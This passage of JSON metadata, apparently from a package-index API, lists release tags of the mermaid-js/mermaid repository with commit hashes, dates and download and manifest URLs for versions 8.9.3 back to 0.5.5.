8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid